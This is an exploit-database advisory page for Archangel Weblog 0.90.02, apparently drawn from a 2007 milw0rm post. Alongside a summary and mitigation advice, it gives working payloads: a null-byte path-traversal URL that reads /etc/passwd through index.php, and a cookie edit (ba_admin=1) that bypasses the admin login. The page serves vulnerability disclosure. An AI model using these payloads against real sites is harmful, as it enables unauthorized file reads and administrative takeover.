header-logo
Suggest Exploit
vendor:
Archangel Weblog
by:
Dj7xpl
7.5
CVSS
HIGH
Local File Inclusion & Login Page Bypass By Cookie
CWE
Product Name: Archangel Weblog
Affected Version From: 0.90.02
Affected Version To: 0.90.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Archangel Weblog version 0.90.02 Local File Inclusion & Login Page Bypass By Cookie

The Archangel Weblog version 0.90.02 is vulnerable to Local File Inclusion and Login Page Bypass By Cookie attacks. An attacker can exploit this vulnerability by sending a specially crafted request to the index.php file, allowing them to include local files or bypass the login page using a manipulated cookie. This can lead to unauthorized access to sensitive information or administrative privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Archangel Weblog software. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files and the login page.
Source

Exploit-DB raw data:

                      \\\|///
                    \\  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
	      Home     :  http://www.archangelmgt.com/weblog.shtml
              Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
	      Author   :  Dj7xpl / Dj7xpl@2600.ir
	      HomePage :  http://Dj7xpl.2600.ir
	      Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]